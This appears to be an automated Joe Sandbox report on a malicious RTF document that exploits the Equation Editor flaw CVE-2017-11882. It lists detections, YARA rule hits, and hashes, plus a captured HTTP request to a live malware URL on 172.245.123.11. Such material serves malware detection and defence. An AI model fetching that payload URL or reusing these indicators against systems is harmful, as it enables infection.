Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BilseMHALF.rtf

Overview

General Information

Sample name:BilseMHALF.rtf
renamed because original name is a hash value
Original sample name:02f4c5ec7b7df33ebc8d9bcedc15f61e.rtf
Analysis ID:1482812
MD5:02f4c5ec7b7df33ebc8d9bcedc15f61e
SHA1:5f4a15f00b5759e1a85f48b700c17c34da5a7e4a
SHA256:5451bce754f64f99ef4d135d9d1cd709021200637cb892cc88dca5680c2f94a4
Tags:rtf
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Document exploit detected (process start blacklist hit)
Found potential equation exploit (CVE-2017-11882)
Office drops RTF file
Office equation editor establishes network connection
Sigma detected: Equation Editor Network Connection
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1960 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 1060 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
BilseMHALF.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x17a0:$obj2: \objdata
  • 0x178c:$obj3: \objupdate
  • 0x1768:$obj4: \objemb
SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\~WRD0000.tmpINDICATOR_RTF_EXPLOIT_CVE_2017_8759_2detects CVE-2017-8759 weaponized RTF documents.ditekSHen
  • 0xba81:$clsid3: 4d73786d6c322e534158584d4c5265616465722e
  • 0xbacb:$ole2: d0cf11e0a1b11ae1
  • 0x62a3:$obj2: \objdata
  • 0x6281:$obj4: \objemb

Exploits

barindex
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 172.245.123.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1060, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

System Summary

barindex
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1060, Protocol: tcp, SourceIp: 172.245.123.11, SourceIsIpv6: false, SourcePort: 80
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1060, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1960, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: BilseMHALF.rtfAvira: detected
Source: http://172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIFAvira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1A253426-04DD-4D22-B4ED-C5DE7E858C0B}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\Desktop\~WRD0000.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: http://172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIFVirustotal: Detection: 7%Perma Link
Source: BilseMHALF.rtfReversingLabs: Detection: 50%
Source: BilseMHALF.rtfVirustotal: Detection: 64%Perma Link

Exploits

barindex
Source: Static RTF information: Object: 0 Offset: 000062A7h
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 172.245.123.11 Port: 80Jump to behavior
Source: ~WRF{1A253426-04DD-4D22-B4ED-C5DE7E858C0B}.tmp.0.drStream path '_1783465612/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{1A253426-04DD-4D22-B4ED-C5DE7E858C0B}.tmp.0.drStream path '_1783465647/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: global trafficHTTP traffic detected: GET /90290/somethingnewthingsareupmeforgirls.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.11Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E93FF875-6031-45AA-B0D0-08CE94421190}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /90290/somethingnewthingsareupmeforgirls.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.11Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 06:21:03 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Content-Length: 300Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 31 37 32 2e 32 34 35 2e 31 32 33 2e 31 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 172.245.123.11 Port 80</address></body></html>
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.353443796.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIF
Source: EQNEDT32.EXE, 00000002.00000002.353443796.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIFicI
Source: EQNEDT32.EXE, 00000002.00000002.353443796.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIFj

System Summary

barindex
Source: BilseMHALF.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: ~WRF{1A253426-04DD-4D22-B4ED-C5DE7E858C0B}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: BilseMHALF.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.
Source: classification engineClassification label: mal100.expl.evad.winRTF@2/10@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$lseMHALF.rtfJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7647.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: BilseMHALF.rtfReversingLabs: Detection: 50%
Source: BilseMHALF.rtfVirustotal: Detection: 64%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
Source: BilseMHALF.LNK.0.drLNK file: ..\..\..\..\..\Desktop\BilseMHALF.rtf
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: ~WRF{1A253426-04DD-4D22-B4ED-C5DE7E858C0B}.tmp.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00553FD5 push eax; ret 2_2_00553FD7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005401F4 push eax; retf 2_2_005401F5

Persistence and Installation Behavior

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 300Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts32
Exploitation for Client Execution
1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping1
Virtualization/Sandbox Evasion
Remote ServicesData from Local System2
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media12
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager3
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive4
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Remote System Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
BilseMHALF.rtf50%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
BilseMHALF.rtf64%VirustotalBrowse
BilseMHALF.rtf100%AviraHEUR/Rtf.Malformed
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1A253426-04DD-4D22-B4ED-C5DE7E858C0B}.tmp100%AviraEXP/CVE-2017-11882.Gen
C:\Users\user\Desktop\~WRD0000.tmp100%AviraEXP/CVE-2017-11882.Gen
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIFj0%Avira URL Cloudsafe
http://172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIF100%Avira URL Cloudmalware
http://172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIFicI0%Avira URL Cloudsafe
http://172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIF7%VirustotalBrowse
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIFtrue
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIFicIEQNEDT32.EXE, 00000002.00000002.353443796.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://172.245.123.11/90290/somethingnewthingsareupmeforgirls.gIFjEQNEDT32.EXE, 00000002.00000002.353443796.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
172.245.123.11
unknownUnited States
36352AS-COLOCROSSINGUStrue
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1482812
Start date and time:2024-07-26 08:20:10 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 4s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:BilseMHALF.rtf
renamed because original name is a hash value
Original Sample Name:02f4c5ec7b7df33ebc8d9bcedc15f61e.rtf
Detection:MAL
Classification:mal100.expl.evad.winRTF@2/10@0/1
EGA Information:Failed
HCA Information:Failed
Cookbook Comments:
  • Found application associated with file extension: .rtf
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
  • Execution Graph export aborted for target EQNEDT32.EXE, PID 1060 because there are no executed function
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
TimeTypeDescription
02:21:00API Interceptor45x Sleep call for process: EQNEDT32.EXE modified
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
172.245.123.11ZAHER.xlsGet hashmaliciousUnknownBrowse
    ZAHER.xlsGet hashmaliciousUnknownBrowse
